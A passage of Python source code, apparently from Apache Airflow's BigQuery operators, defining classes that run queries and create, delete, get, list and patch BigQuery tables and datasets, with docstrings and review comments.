        self.labels = labels
        self.priority = priority
        self.time_partitioning = time_partitioning
        self.api_resource_configs = api_resource_configs
        self.cluster_fields = cluster_fields
        self.location = location
        self.encryption_configuration = encryption_configuration
        # Lazily created in execute() so on_kill() can tell whether a
        # query was ever started.
        self.hook = None  # type: Optional[BigQueryHook]
        self.impersonation_chain = impersonation_chain

    def execute(self, context):
        """Run the configured SQL (one statement or a list) and push the
        resulting job id(s) to XCom under key ``job_id``."""
        if self.hook is None:
            self.log.info('Executing: %s', self.sql)
            self.hook = BigQueryHook(
                gcp_conn_id=self.gcp_conn_id,
                use_legacy_sql=self.use_legacy_sql,
                delegate_to=self.delegate_to,
                location=self.location,
                impersonation_chain=self.impersonation_chain,
            )
        # All run_query arguments except the SQL itself are identical for the
        # single-statement and multi-statement cases; build them once instead
        # of duplicating the call site.
        run_query_kwargs = dict(
            destination_dataset_table=self.destination_dataset_table,
            write_disposition=self.write_disposition,
            allow_large_results=self.allow_large_results,
            flatten_results=self.flatten_results,
            udf_config=self.udf_config,
            maximum_billing_tier=self.maximum_billing_tier,
            maximum_bytes_billed=self.maximum_bytes_billed,
            create_disposition=self.create_disposition,
            query_params=self.query_params,
            labels=self.labels,
            schema_update_options=self.schema_update_options,
            priority=self.priority,
            time_partitioning=self.time_partitioning,
            api_resource_configs=self.api_resource_configs,
            cluster_fields=self.cluster_fields,
            encryption_configuration=self.encryption_configuration,
        )
        # NOTE: str must be checked before Iterable, since str is iterable.
        if isinstance(self.sql, str):
            job_id = self.hook.run_query(sql=self.sql, **run_query_kwargs)
        elif isinstance(self.sql, Iterable):
            job_id = [self.hook.run_query(sql=s, **run_query_kwargs) for s in self.sql]
        else:
            # Bug fix: the original interpolated ``type(str)`` (always
            # "<class 'type'>") instead of the actual type of self.sql.
            raise AirflowException(
                f"argument 'sql' of type {type(self.sql)} is neither a string nor an iterable"
            )
        context['task_instance'].xcom_push(key='job_id', value=job_id)

    def on_kill(self) -> None:
        """Cancel the running BigQuery job (if one was started) on task kill."""
        super().on_kill()
        if self.hook is not None:
            self.log.info('Cancelling running query')
            self.hook.cancel_query()
class BigQueryCreateEmptyTableOperator(BaseOperator):
    """
    Creates a new, empty table in the specified BigQuery dataset,
    optionally with schema.

    The schema to be used for the BigQuery table may be specified in one of
    two ways. You may either directly pass the schema fields in, or you may
    point the operator to a Google Cloud Storage object name. The object in
    Google Cloud Storage must be a JSON file with the schema fields in it.
    You can also create a table without schema.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryCreateEmptyTableOperator`

    :param project_id: The project to create the table into. (templated)
    :type project_id: str
    :param dataset_id: The dataset to create the table into. (templated)
    :type dataset_id: str
    :param table_id: The Name of the table to be created. (templated)
    :type table_id: str
    :param table_resource: Table resource as described in documentation:
        https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#Table
        If provided all other parameters are ignored.
    :type table_resource: Dict[str, Any]
    :param schema_fields: If set, the schema field list as defined here:
        https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.load.schema

        **Example**: ::

            schema_fields=[{"name": "emp_name", "type": "STRING", "mode": "REQUIRED"},
                           {"name": "salary", "type": "INTEGER", "mode": "NULLABLE"}]

    :type schema_fields: list
    :param gcs_schema_object: Full path to the JSON file containing
        schema (templated). For
        example: ``gs://test-bucket/dir1/dir2/employee_schema.json``
    :type gcs_schema_object: str
    :param time_partitioning: configure optional time partitioning fields i.e.
        partition by field, type and expiration as per API specifications.

        .. seealso::
            https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#timePartitioning
    :type time_partitioning: dict
    :param bigquery_conn_id: [Optional] The connection ID used to connect to Google Cloud and
        interact with the Bigquery service.
    :type bigquery_conn_id: str
    :param google_cloud_storage_conn_id: [Optional] The connection ID used to connect to Google Cloud.
        and interact with the Google Cloud Storage service.
    :type google_cloud_storage_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of authority,
        if any. For this to work, the service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param labels: a dictionary containing labels for the table, passed to BigQuery

        **Example (with schema JSON in GCS)**: ::

            CreateTable = BigQueryCreateEmptyTableOperator(
                task_id='BigQueryCreateEmptyTableOperator_task',
                dataset_id='ODS',
                table_id='Employees',
                project_id='internal-gcp-project',
                gcs_schema_object='gs://schema-bucket/employee_schema.json',
                bigquery_conn_id='airflow-conn-id',
                google_cloud_storage_conn_id='airflow-conn-id'
            )

        **Corresponding Schema file** (``employee_schema.json``): ::

            [
                {
                    "mode": "NULLABLE",
                    "name": "emp_name",
                    "type": "STRING"
                },
                {
                    "mode": "REQUIRED",
                    "name": "salary",
                    "type": "INTEGER"
                }
            ]

        **Example (with schema in the DAG)**: ::

            CreateTable = BigQueryCreateEmptyTableOperator(
                task_id='BigQueryCreateEmptyTableOperator_task',
                dataset_id='ODS',
                table_id='Employees',
                project_id='internal-gcp-project',
                schema_fields=[{"name": "emp_name", "type": "STRING", "mode": "REQUIRED"},
                               {"name": "salary", "type": "INTEGER", "mode": "NULLABLE"}],
                bigquery_conn_id='airflow-conn-id-account',
                google_cloud_storage_conn_id='airflow-conn-id'
            )
    :type labels: dict
    :param view: [Optional] A dictionary containing definition for the view.
        If set, it will create a view instead of a table:

        .. seealso::
            https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ViewDefinition
    :type view: dict
    :param materialized_view: [Optional] The materialized view definition.
    :type materialized_view: dict
    :param encryption_configuration: [Optional] Custom encryption configuration (e.g., Cloud KMS keys).

        **Example**: ::

            encryption_configuration = {
                "kmsKeyName": "projects/testp/locations/us/keyRings/test-kr/cryptoKeys/test-key"
            }
    :type encryption_configuration: dict
    :param location: The location used for the operation.
    :type location: str
    :param cluster_fields: [Optional] The fields used for clustering.
        BigQuery supports clustering for both partitioned and
        non-partitioned tables.

        .. seealso::
            https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#clustering.fields
    :type cluster_fields: list
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    :param exists_ok: If ``True``, ignore "already exists" errors when creating the table.
    :type exists_ok: bool
    """

    # Attributes rendered by Jinja templating before task execution.
    template_fields = (
        'dataset_id',
        'table_id',
        'project_id',
        'gcs_schema_object',
        'labels',
        'view',
        'materialized_view',
        'impersonation_chain',
    )
    # Render these templated fields as pretty-printed JSON in the UI.
    template_fields_renderers = {"table_resource": "json", "materialized_view": "json"}
    ui_color = BigQueryUIColors.TABLE.value

    # pylint: disable=too-many-arguments
    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        table_id: str,
        table_resource: Optional[Dict[str, Any]] = None,
        project_id: Optional[str] = None,
        schema_fields: Optional[List] = None,
        gcs_schema_object: Optional[str] = None,
        time_partitioning: Optional[Dict] = None,
        bigquery_conn_id: str = 'google_cloud_default',
        google_cloud_storage_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        labels: Optional[Dict] = None,
        view: Optional[Dict] = None,
        materialized_view: Optional[Dict] = None,
        encryption_configuration: Optional[Dict] = None,
        location: Optional[str] = None,
        cluster_fields: Optional[List[str]] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        exists_ok: bool = False,
        **kwargs,
    ) -> None:
        """Store the request parameters; the table is created in execute()."""
        super().__init__(**kwargs)
        self.project_id = project_id
        self.dataset_id = dataset_id
        self.table_id = table_id
        self.schema_fields = schema_fields
        self.gcs_schema_object = gcs_schema_object
        self.bigquery_conn_id = bigquery_conn_id
        self.google_cloud_storage_conn_id = google_cloud_storage_conn_id
        self.delegate_to = delegate_to
        # Normalize None to an empty dict so downstream code can treat the
        # value uniformly.
        self.time_partitioning = {} if time_partitioning is None else time_partitioning
        self.labels = labels
        self.view = view
        self.materialized_view = materialized_view
        self.encryption_configuration = encryption_configuration
        self.location = location
        self.cluster_fields = cluster_fields
        self.table_resource = table_resource
        self.impersonation_chain = impersonation_chain
        self.exists_ok = exists_ok

    def execute(self, context) -> None:
        bq_hook = BigQueryHook(
            gcp_conn_id=self.bigquery_conn_id,
            delegate_to=self.delegate_to,
            location=self.location,
            impersonation_chain=self.impersonation_chain,
        )

        # Schema precedence: explicit schema_fields wins; otherwise, if a GCS
        # object path was given, download it and parse it as the JSON schema.
        if not self.schema_fields and self.gcs_schema_object:
            gcs_bucket, gcs_object = _parse_gcs_url(self.gcs_schema_object)
            gcs_hook = GCSHook(
                gcp_conn_id=self.google_cloud_storage_conn_id,
                delegate_to=self.delegate_to,
                impersonation_chain=self.impersonation_chain,
            )
            schema_fields = json.loads(gcs_hook.download(gcs_bucket, gcs_object))
        else:
            schema_fields = self.schema_fields

        try:
            self.log.info('Creating table')
            table = bq_hook.create_empty_table(
                project_id=self.project_id,
                dataset_id=self.dataset_id,
                table_id=self.table_id,
                schema_fields=schema_fields,
                time_partitioning=self.time_partitioning,
                cluster_fields=self.cluster_fields,
                labels=self.labels,
                view=self.view,
                materialized_view=self.materialized_view,
                encryption_configuration=self.encryption_configuration,
                table_resource=self.table_resource,
                exists_ok=self.exists_ok,
            )
            self.log.info(
                'Table %s.%s.%s created successfully', table.project, table.dataset_id, table.table_id
            )
        except Conflict:
            # NOTE(review): an "already exists" Conflict is swallowed and only
            # logged here regardless of ``exists_ok``, so the task never fails
            # on a pre-existing table — confirm this is the intended contract.
            self.log.info('Table %s.%s already exists.', self.dataset_id, self.table_id)
# pylint: disable=too-many-instance-attributes
class BigQueryCreateExternalTableOperator(BaseOperator):
    """
    Creates a new external table in the dataset with the data from Google Cloud
    Storage.

    The schema to be used for the BigQuery table may be specified in one of
    two ways. You may either directly pass the schema fields in, or you may
    point the operator to a Google Cloud Storage object name. The object in
    Google Cloud Storage must be a JSON file with the schema fields in it.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryCreateExternalTableOperator`

    :param bucket: The bucket to point the external table to. (templated)
    :type bucket: str
    :param source_objects: List of Google Cloud Storage URIs to point
        table to. If source_format is 'DATASTORE_BACKUP', the list must only contain a single URI.
    :type source_objects: list
    :param destination_project_dataset_table: The dotted ``(<project>.)<dataset>.<table>``
        BigQuery table to load data into (templated). If ``<project>`` is not included,
        project will be the project defined in the connection json.
    :type destination_project_dataset_table: str
    :param schema_fields: If set, the schema field list as defined here:
        https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.load.schema

        **Example**: ::

            schema_fields=[{"name": "emp_name", "type": "STRING", "mode": "REQUIRED"},
                           {"name": "salary", "type": "INTEGER", "mode": "NULLABLE"}]

        Should not be set when source_format is 'DATASTORE_BACKUP'.
    :type schema_fields: list
    :param table_resource: Table resource as described in documentation:
        https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#Table
        If provided all other parameters are ignored. External schema from object will be resolved.
    :type table_resource: Dict[str, Any]
    :param schema_object: If set, a GCS object path pointing to a .json file that
        contains the schema for the table. (templated)
    :type schema_object: str
    :param source_format: File format of the data.
    :type source_format: str
    :param compression: [Optional] The compression type of the data source.
        Possible values include GZIP and NONE.
        The default value is NONE.
        This setting is ignored for Google Cloud Bigtable,
        Google Cloud Datastore backups and Avro formats.
    :type compression: str
    :param skip_leading_rows: Number of rows to skip when loading from a CSV.
    :type skip_leading_rows: int
    :param field_delimiter: The delimiter to use for the CSV.
    :type field_delimiter: str
    :param max_bad_records: The maximum number of bad records that BigQuery can
        ignore when running the job.
    :type max_bad_records: int
    :param quote_character: The value that is used to quote data sections in a CSV file.
    :type quote_character: str
    :param allow_quoted_newlines: Whether to allow quoted newlines (true) or not (false).
    :type allow_quoted_newlines: bool
    :param allow_jagged_rows: Accept rows that are missing trailing optional columns.
        The missing values are treated as nulls. If false, records with missing trailing
        columns are treated as bad records, and if there are too many bad records, an
        invalid error is returned in the job result. Only applicable to CSV, ignored
        for other formats.
    :type allow_jagged_rows: bool
    :param bigquery_conn_id: (Optional) The connection ID used to connect to Google Cloud and
        interact with the Bigquery service.
    :type bigquery_conn_id: str
    :param google_cloud_storage_conn_id: (Optional) The connection ID used to connect to Google Cloud
        and interact with the Google Cloud Storage service.
    :type google_cloud_storage_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of authority,
        if any. For this to work, the service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param src_fmt_configs: configure optional fields specific to the source format
    :type src_fmt_configs: dict
    :param labels: a dictionary containing labels for the table, passed to BigQuery
    :type labels: dict
    :param encryption_configuration: [Optional] Custom encryption configuration (e.g., Cloud KMS keys).

        **Example**: ::

            encryption_configuration = {
                "kmsKeyName": "projects/testp/locations/us/keyRings/test-kr/cryptoKeys/test-key"
            }
    :type encryption_configuration: dict
    :param location: The location used for the operation.
    :type location: str
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """

    # Attributes rendered by Jinja templating before task execution.
    template_fields = (
        'bucket',
        'source_objects',
        'schema_object',
        'destination_project_dataset_table',
        'labels',
        'table_resource',
        'impersonation_chain',
    )
    # Render table_resource as pretty-printed JSON in the UI.
    template_fields_renderers = {"table_resource": "json"}
    ui_color = BigQueryUIColors.TABLE.value

    # pylint: disable=too-many-arguments,too-many-locals
    @apply_defaults
    def __init__(
        self,
        *,
        bucket: str,
        source_objects: List,
        destination_project_dataset_table: str,
        table_resource: Optional[Dict[str, Any]] = None,
        schema_fields: Optional[List] = None,
        schema_object: Optional[str] = None,
        source_format: str = 'CSV',
        compression: str = 'NONE',
        skip_leading_rows: int = 0,
        field_delimiter: str = ',',
        max_bad_records: int = 0,
        quote_character: Optional[str] = None,
        allow_quoted_newlines: bool = False,
        allow_jagged_rows: bool = False,
        bigquery_conn_id: str = 'google_cloud_default',
        google_cloud_storage_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        src_fmt_configs: Optional[dict] = None,
        labels: Optional[Dict] = None,
        encryption_configuration: Optional[Dict] = None,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        """Store the request parameters; the table is created in execute()."""
        super().__init__(**kwargs)

        # GCS config
        self.bucket = bucket
        self.source_objects = source_objects
        self.schema_object = schema_object

        # BQ config
        # True when any legacy keyword argument was supplied (truthy); used to
        # reject mixing the legacy keywords with ``table_resource``.
        kwargs_passed = any(
            [
                destination_project_dataset_table,
                schema_fields,
                source_format,
                compression,
                skip_leading_rows,
                field_delimiter,
                max_bad_records,
                quote_character,
                allow_quoted_newlines,
                allow_jagged_rows,
                src_fmt_configs,
                labels,
                encryption_configuration,
            ]
        )

        # The legacy keyword path (no table_resource) is deprecated; warn so
        # users migrate to passing a full table definition.
        if not table_resource:
            warnings.warn(
                "Passing table parameters via keywords arguments will be deprecated. "
                "Please use provide table definition using `table_resource` parameter."
                "You can still use external `schema_object`. ",
                DeprecationWarning,
                stacklevel=2,
            )

        if table_resource and kwargs_passed:
            raise ValueError("You provided both `table_resource` and exclusive keywords arguments.")

        self.table_resource = table_resource
        self.destination_project_dataset_table = destination_project_dataset_table
        self.schema_fields = schema_fields
        self.source_format = source_format
        self.compression = compression
        self.skip_leading_rows = skip_leading_rows
        self.field_delimiter = field_delimiter
        self.max_bad_records = max_bad_records
        self.quote_character = quote_character
        self.allow_quoted_newlines = allow_quoted_newlines
        self.allow_jagged_rows = allow_jagged_rows
        self.bigquery_conn_id = bigquery_conn_id
        self.google_cloud_storage_conn_id = google_cloud_storage_conn_id
        self.delegate_to = delegate_to
        self.src_fmt_configs = src_fmt_configs or {}
        self.labels = labels
        self.encryption_configuration = encryption_configuration
        self.location = location
        self.impersonation_chain = impersonation_chain

    def execute(self, context) -> None:
        bq_hook = BigQueryHook(
            gcp_conn_id=self.bigquery_conn_id,
            delegate_to=self.delegate_to,
            location=self.location,
            impersonation_chain=self.impersonation_chain,
        )

        # Resolve the schema: explicit schema_fields wins; otherwise download
        # the GCS schema object, except for DATASTORE_BACKUP (which carries
        # its own schema).
        if not self.schema_fields and self.schema_object and self.source_format != 'DATASTORE_BACKUP':
            gcs_hook = GCSHook(
                gcp_conn_id=self.google_cloud_storage_conn_id,
                delegate_to=self.delegate_to,
                impersonation_chain=self.impersonation_chain,
            )
            schema_fields = json.loads(gcs_hook.download(self.bucket, self.schema_object))
        else:
            schema_fields = self.schema_fields

        if schema_fields and self.table_resource:
            # NOTE(review): assumes the provided table_resource already has an
            # "externalDataConfiguration" mapping — a KeyError is raised
            # otherwise; confirm callers always include it.
            self.table_resource["externalDataConfiguration"]["schema"] = schema_fields

        if self.table_resource:
            # New-style path: pass the full Table resource to the hook.
            tab_ref = TableReference.from_string(self.destination_project_dataset_table)
            bq_hook.create_empty_table(
                table_resource=self.table_resource,
                project_id=tab_ref.project,
                table_id=tab_ref.table_id,
                dataset_id=tab_ref.dataset_id,
            )
        else:
            # Legacy keyword path: build the source URIs and delegate to the
            # (deprecated) create_external_table hook method.
            source_uris = [f"gs://{self.bucket}/{source_object}" for source_object in self.source_objects]

            bq_hook.create_external_table(
                external_project_dataset_table=self.destination_project_dataset_table,
                schema_fields=schema_fields,
                source_uris=source_uris,
                source_format=self.source_format,
                compression=self.compression,
                skip_leading_rows=self.skip_leading_rows,
                field_delimiter=self.field_delimiter,
                max_bad_records=self.max_bad_records,
                quote_character=self.quote_character,
                allow_quoted_newlines=self.allow_quoted_newlines,
                allow_jagged_rows=self.allow_jagged_rows,
                src_fmt_configs=self.src_fmt_configs,
                labels=self.labels,
                encryption_configuration=self.encryption_configuration,
            )
class BigQueryDeleteDatasetOperator(BaseOperator):
"""
This operator deletes an existing dataset from your Project in Big query.
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets/delete
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryDeleteDatasetOperator`
:param project_id: The project id of the dataset.
:type project_id: str
:param dataset_id: The dataset to be deleted.
:type dataset_id: str
:param delete_contents: (Optional) Whether to force the deletion even if the dataset is not empty.
Will delete all tables (if any) in the dataset if set to True.
Will raise HttpError 400: "{dataset_id} is still in use" if set to False and dataset is not empty.
The default value is False.
:type delete_contents: bool
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
:type bigquery_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
**Example**: ::
delete_temp_data = BigQueryDeleteDatasetOperator(
dataset_id='temp-dataset',
project_id='temp-project',
delete_contents=True, # Force the deletion of the dataset as well as its tables (if any).
gcp_conn_id='_my_gcp_conn_',
task_id='Deletetemp',
dag=dag)
"""
template_fields = (
'dataset_id',
'project_id',
'impersonation_chain',
)
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
project_id: Optional[str] = None,
delete_contents: bool = False,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
stacklevel=3,
)
gcp_conn_id = bigquery_conn_id
self.dataset_id = dataset_id
self.project_id = project_id
self.delete_contents = delete_contents
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
    def execute(self, context) -> None:
        """Delete the configured BigQuery dataset using a freshly built hook.

        Deletion honours ``delete_contents``: when True the dataset is removed
        even if it still contains tables.
        """
        self.log.info('Dataset id: %s Project id: %s', self.dataset_id, self.project_id)
        bq_hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        bq_hook.delete_dataset(
            project_id=self.project_id, dataset_id=self.dataset_id, delete_contents=self.delete_contents
        )
class BigQueryCreateEmptyDatasetOperator(BaseOperator):
    """
    This operator is used to create new dataset for your Project in BigQuery.
    https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryCreateEmptyDatasetOperator`

    :param project_id: The name of the project where we want to create the dataset.
    :type project_id: str
    :param dataset_id: The id of dataset. Don't need to provide, if datasetId in dataset_reference.
    :type dataset_id: str
    :param location: The geographic location where the dataset should reside.
    :type location: str
    :param dataset_reference: Dataset reference that could be provided with request body.
        More info:
        https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
    :type dataset_reference: dict
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
        This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
    :type bigquery_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of authority,
        if any. For this to work, the service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    :param exists_ok: If ``True``, ignore "already exists" errors when creating the dataset.
    :type exists_ok: bool

    **Example**: ::

        create_new_dataset = BigQueryCreateEmptyDatasetOperator(
            dataset_id='new-dataset',
            project_id='my-project',
            dataset_reference={"friendlyName": "New Dataset"},
            gcp_conn_id='_my_gcp_conn_',
            task_id='newDatasetCreator',
            dag=dag)
    """

    template_fields = (
        'dataset_id',
        'project_id',
        'dataset_reference',
        'impersonation_chain',
    )
    template_fields_renderers = {"dataset_reference": "json"}
    ui_color = BigQueryUIColors.DATASET.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: Optional[str] = None,
        project_id: Optional[str] = None,
        dataset_reference: Optional[Dict] = None,
        location: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        exists_ok: bool = False,
        **kwargs,
    ) -> None:
        # Deprecated alias: if the caller still passes bigquery_conn_id, warn
        # (pointing at the DAG file via stacklevel=3) and use it as gcp_conn_id.
        if bigquery_conn_id:
            warnings.warn(
                "The bigquery_conn_id parameter has been deprecated. You should pass "
                "the gcp_conn_id parameter.",
                DeprecationWarning,
                stacklevel=3,
            )
            gcp_conn_id = bigquery_conn_id
        self.dataset_id = dataset_id
        self.project_id = project_id
        self.location = location
        self.gcp_conn_id = gcp_conn_id
        # Default to an empty body so execute() can always pass a dict through.
        self.dataset_reference = dataset_reference if dataset_reference else {}
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        self.exists_ok = exists_ok
        super().__init__(**kwargs)

    def execute(self, context) -> None:
        """Create the dataset; optionally tolerate a pre-existing one."""
        bq_hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            location=self.location,
            impersonation_chain=self.impersonation_chain,
        )
        try:
            bq_hook.create_empty_dataset(
                project_id=self.project_id,
                dataset_id=self.dataset_id,
                dataset_reference=self.dataset_reference,
                location=self.location,
                exists_ok=self.exists_ok,
            )
        except Conflict:
            # The API reports "already exists" as 409 Conflict; treat it as
            # success and log the id (preferring the one in the request body).
            dataset_id = self.dataset_reference.get("datasetReference", {}).get("datasetId", self.dataset_id)
            self.log.info('Dataset %s already exists.', dataset_id)
class BigQueryGetDatasetOperator(BaseOperator):
    """
    Fetch the dataset identified by ``dataset_id`` and return its API representation.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryGetDatasetOperator`

    :param dataset_id: The id of dataset. Don't need to provide,
        if datasetId in dataset_reference.
    :type dataset_id: str
    :param project_id: The name of the project where we want to create the dataset.
        Don't need to provide, if projectId in dataset_reference.
    :type project_id: str
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of
        authority, if any. The service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param impersonation_chain: Optional service account (or chained list of
        accounts) to impersonate using short-term credentials. A string must be
        granted the Service Account Token Creator IAM role by the originating
        account; in a sequence each identity grants that role to the one before
        it, the first being granted by the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    :rtype: dataset
        https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
    """

    template_fields = (
        'dataset_id',
        'project_id',
        'impersonation_chain',
    )
    ui_color = BigQueryUIColors.DATASET.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        # Connection / credential settings first, then target identifiers.
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        self.dataset_id = dataset_id
        self.project_id = project_id
        super().__init__(**kwargs)

    def execute(self, context):
        """Return the dataset resource as a plain API-representation dict."""
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        self.log.info('Start getting dataset: %s:%s', self.project_id, self.dataset_id)
        fetched = hook.get_dataset(dataset_id=self.dataset_id, project_id=self.project_id)
        return fetched.to_api_repr()
class BigQueryGetDatasetTablesOperator(BaseOperator):
    """
    List the tables contained in a given dataset.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryGetDatasetTablesOperator`

    :param dataset_id: the dataset ID of the requested dataset.
    :type dataset_id: str
    :param project_id: (Optional) the project of the requested dataset. If None,
        self.project_id will be used.
    :type project_id: str
    :param max_results: (Optional) the maximum number of tables to return.
    :type max_results: int
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of
        authority, if any. The service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param impersonation_chain: Optional service account (or chained list of
        accounts) to impersonate using short-term credentials. A string must be
        granted the Service Account Token Creator IAM role by the originating
        account; in a sequence each identity grants that role to the one before
        it, the first being granted by the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """

    template_fields = (
        'dataset_id',
        'project_id',
        'impersonation_chain',
    )
    ui_color = BigQueryUIColors.DATASET.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        project_id: Optional[str] = None,
        max_results: Optional[int] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        # Credentials-related settings.
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        # Request parameters.
        self.dataset_id = dataset_id
        self.project_id = project_id
        self.max_results = max_results
        super().__init__(**kwargs)

    def execute(self, context):
        """Return the table list for ``dataset_id`` via the hook."""
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        tables = hook.get_dataset_tables(
            dataset_id=self.dataset_id,
            project_id=self.project_id,
            max_results=self.max_results,
        )
        return tables
class BigQueryPatchDatasetOperator(BaseOperator):
    """
    Patch a dataset, replacing only the fields present in the submitted resource.

    .. deprecated::
        Use :class:`BigQueryUpdateDatasetOperator` instead.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryPatchDatasetOperator`

    :param dataset_id: The id of dataset. Don't need to provide,
        if datasetId in dataset_reference.
    :type dataset_id: str
    :param dataset_resource: Dataset resource that will be provided with request body.
        https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
    :type dataset_resource: dict
    :param project_id: The name of the project where we want to create the dataset.
        Don't need to provide, if projectId in dataset_reference.
    :type project_id: str
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of
        authority, if any. The service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param impersonation_chain: Optional service account (or chained list of
